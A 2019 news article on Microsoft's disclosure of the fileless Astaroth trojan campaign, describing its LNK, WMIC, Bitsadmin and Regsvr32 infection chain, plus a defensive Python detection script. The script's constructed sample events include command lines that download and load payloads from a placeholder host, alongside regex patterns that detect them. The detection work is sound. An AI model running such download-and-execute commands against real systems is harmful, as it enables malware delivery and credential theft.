9 July 2019

Microsoft warns about fileless Astaroth trojan campaign


The Microsoft Defender ATP Research Team has disclosed details about an ongoing malware campaign that is distributing the Astaroth malware using fileless and living-off-the-land techniques, which make it harder for security researchers and antivirus solutions to detect attacks in progress.

The Astaroth trojan, which has been active since at least 2017, is able to steal users' sensitive information such as credentials, keystrokes, and other data without dropping any executable file on the disk or installing any software on the victim's machine. All the information is then sent to a remote attacker, who can use the data to move laterally across networks, carry out financial theft, or sell victim information in the cybercriminal underground.

While analysing Windows telemetry data, Andrea Lelli, a member of the Windows Defender ATP team, spotted a sudden spike in usage of the Windows Management Instrumentation Command-line (WMIC) – a legitimate tool that ships with all modern versions of Windows. Upon further investigation it became clear that the source of the suspicious activity was a campaign that aimed to run the Astaroth backdoor directly in memory.

The discovered malware campaign uses several fileless techniques and a multi-stage infection process that starts with a spear-phishing email containing a malicious link that led potential victims to an LNK file.

After being double-clicked, the LNK file causes the execution of the WMIC tool with the “/Format” parameter, which allows the download and execution of JavaScript code. The JavaScript code in turn downloads payloads by abusing the legitimate Bitsadmin tool.

“Two of them result in plain DLL files (the others remain encrypted). The Regsvr32 tool is then used to load one of the decoded DLLs, which in turn decrypts and loads other files until the final payload, Astaroth, is injected into the Userinit process,” explained the researcher in a blog post.
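Each stage of the chain described above is a legitimate Windows binary invoked with unusual arguments, which is exactly what process-creation telemetry can catch. The following added example (not code from Microsoft or the article) runs three simple rules over constructed Sysmon-style process events; all hosts, paths and rule names are placeholders.

```python
"""Toy detection pass over constructed process-creation events.

Flags the living-off-the-land chain described in the article:
wmic.exe /format pointing at a remote stylesheet, bitsadmin.exe fetching
from a URL, and regsvr32.exe loading a DLL from a user-writable path.
All hosts, paths and rule names below are constructed placeholders.
"""
import re

# Constructed sample events: (image path, command line).
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\wbem\WMIC.exe",
     'wmic os get /format:"https://cdn.example.invalid/v.xsl"'),
    (r"C:\Windows\System32\bitsadmin.exe",
     r"bitsadmin /transfer job https://cdn.example.invalid/a.bin C:\Users\Public\a.bin"),
    (r"C:\Windows\System32\regsvr32.exe",
     r"regsvr32 /s C:\Users\Public\a.dll"),
    # Benign: /format with a built-in local formatter, no URL.
    (r"C:\Windows\System32\wbem\WMIC.exe", "wmic cpu get name /format:list"),
    (r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

URL_RE = re.compile(r"https?://", re.I)
# Heuristic: DLLs registered from user-writable locations deserve a look.
USER_WRITABLE_RE = re.compile(r"\\(Users|ProgramData|Temp)\\", re.I)


def classify(event):
    """Return the name of the first matching rule, or None if benign."""
    image, cmdline = event
    name = image.rsplit("\\", 1)[-1].lower()
    low = cmdline.lower()
    if name == "wmic.exe" and "/format" in low and URL_RE.search(cmdline):
        return "wmic_remote_format"      # WMIC pulling a stylesheet over HTTP(S)
    if name == "bitsadmin.exe" and URL_RE.search(cmdline):
        return "bitsadmin_download"      # BITS used as a downloader
    if name == "regsvr32.exe" and USER_WRITABLE_RE.search(cmdline):
        return "regsvr32_user_path_dll"  # DLL loaded from a user-writable path
    return None


def detect(events):
    """Return (rule, command line) pairs for every event that matches a rule."""
    hits = []
    for ev in events:
        rule = classify(ev)
        if rule:
            hits.append((rule, ev[1]))
    return hits
```

Each rule fires on an individual event; correlating all three on one host within a short window is what separates this chain from occasional legitimate use of the same tools.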

What this means is that the malware doesn’t rely on any traditional methods (vulnerability exploits or trojan downloaders); instead it uses only legitimate system tools and commands to achieve its goal and to disguise its activity – a technique that security experts call "living off the land". This technique allows the malware to hide from most endpoint antivirus solutions, which are based on static file analysis.

For traditional, file-centric antivirus solutions the only window of opportunity to detect this attack may be when the two DLLs are decoded after being downloaded, said Lelli. The researcher pointed out that:

“Being invisible may help you for some things, but you should not be under the illusion that you are invincible. The same applies to fileless malware: abusing fileless techniques does not put malware beyond the reach or visibility of security software. On the contrary, some of the fileless techniques may be so unusual and anomalous that they draw immediate attention to the malware, in the same way that a bag of money moving by itself would.”
